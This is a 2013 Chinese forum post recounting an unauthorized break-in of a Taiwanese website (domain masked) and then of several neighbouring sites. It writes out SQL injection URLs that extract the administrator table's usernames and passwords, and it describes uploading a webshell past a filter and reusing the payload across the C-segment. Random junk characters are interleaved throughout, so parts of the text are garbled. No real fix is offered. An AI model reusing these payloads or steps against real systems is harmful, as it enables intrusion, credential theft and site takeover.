发现一个注入点
& [, o; I" [9 Phttp://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
# i% [& v5 h( e. H9 N/ p$ h& ]# t; _
习惯性的加’having1=1--* {2 l# A: E0 x
# d0 K1 P: U1 }; G. lhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—2 Y9 L( F6 V7 T) U
# |' {0 n; f# A) y/ T( b7 Z: k" N
0
8 r% I1 e! c! o2 x
" r% W }1 x( d5 y5 y% J- L6 s爆出Diary_A.dl_Title(这时候很激动啊)
3 {* b7 k6 w$ Z: K! o* ?" \& J- N2 p* m) X3 ?+ e
那么继续
, G7 }0 d; n1 Y* C6 Hhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—
' W1 v+ C2 j# Q' |1 |5 g# k9 f
/ @4 I3 V( w5 u E- A继续,一直爆下去" X( g# ~. G6 K8 A; k
+ q( c6 M* [$ N2 k( }% }
爆到几个字段和表段 但是没找到需要的管理用户的字段! c- X6 Y# \4 l* E
/ Z$ O7 x( A ]
蛋疼了 怎么办 然后去后台登陆页看源码& e, u7 l" Z* s/ k8 X/ ?. b
/ P+ b3 a4 m: X3 L1 W, F+ ~. x8 C0 n0
* {0 A4 i3 ^- E z! O2 f$ k$ I; B% J7 h/ f4 Z! e
Input name= “ADUID”- @* z5 I% U: d/ R2 q
Input name= “ADPWD”
* Z+ `9 _! Y) ?- K' w
3 }$ t5 ]* P5 R7 m! z7 H很幸运 找到了字段那就继续# M# L6 r- a3 e0 S8 r- j- H
找到之后开始爆用户
! w: J. U( c1 y( F. Nhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
8 }& I2 r, }* V# F8 v爆密码
- Y- F4 V. ~! z+ O0 _. Q- fhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
* g; }1 z( F% k测试了下 这个注入点只能爆到文章哪里的表
: F8 F! s: l2 Y7 e- [3 v5 X# i( _8 ~; o
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了( v- o O: N" K- L3 g3 R5 [
& O( }* Q+ Y4 z1 i$ c
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了8 a% d. H! [5 A6 p" Z9 u1 s3 U1 o: Z0 `
% c' N' P+ Y, r( ~
473
5 c. ~. V9 R0 T6 g( ]2 B" {- R- F
进后台; H' W$ V0 r/ t
( A4 @# a4 V- j# K% [/ e+ ~1 D% ?! L9 l1 u: L5 M& }5 `& M( i8 ]" ^
发现几个上传点 有的地方不能上传 而且防止恶意代码+ d: u- D7 t! A- P' t
0 A8 v* Y: T2 L! L- G! }没办法 各种百度各种找大牛 找到一只好像可以突破的马
5 u5 B' X5 c4 M5 h! \) c0 j( E. i4 N' `) q& E' t/ D: M: R
5 j [5 {" E5 e在系统管理那里直接上传 不过没有显示地址
6 B, h# _6 P0 w$ I- B2 T! A1 _
& ~( t9 b% A0 Q& ~7 `$ P再上传一次 抓包 搞定OK
& j1 h; O$ Y. I4 l t F. H% C. v6 d/ F/ z% |
6 Y; Q/ g% q4 n. L! P- @6 R& m# E$ r# w8 h/ x* U/ z9 K c
472! I3 I8 H4 q) b& m0 E% i
! x$ k/ @6 A. \9 P+ {
晚上不行了 去睡觉。。。
( d9 b" t9 a% b5 @1 j# h第二天刚起床 闲的没事做继续日站吧 2 I2 Y) U; b4 G- x; \
& W. p' B0 [, v& M {
找个站 就把这个站的旁c扫了下$ ^2 T4 Z7 x0 F* d
, @) w1 b- S( b/ R# o
发现c段也有一个购物站 ,然后还和这个站的模板差不多
- {/ ]) |& I; G6 D3 s
9 g0 p- [! q4 s r2 R就找到会员登录口测试' N; t& i% X& C) c2 A
( o6 B5 g# {# p$ ^( @8 b/ f7 b B6 V'and (select top 1 MGR_UID from A_MGR)>0—4 j) { `# h$ m! _; P/ E( r
果断爆到了 这时候我很激动 通杀
" V2 y6 w+ d6 p* n( V j
$ @3 K9 y% `' L* D) _- Q, t5 y再次翻c段, ^/ m" ]6 P% v- e# @
3 d6 B9 J6 p! @5 w5 e2 c翻出几个站 都成功拿下' U+ E s1 f" a, C9 T
, C6 N" G; p( O9 q" u' P B" N3 g X: T2 e/ b9 m
g/ n4 [4 w" R8 F
修复方案:# N( W: {0 U0 j
他们比我专业
4 w: C, u8 H' S6 e5 y- \1 G
* K" A+ b. I/ u
/ \7 }" k- _, H7 Z$ l L! M' ?) H& C. K" Z
|
发表于 2013-4-4 17:40:38
收藏
支持
反对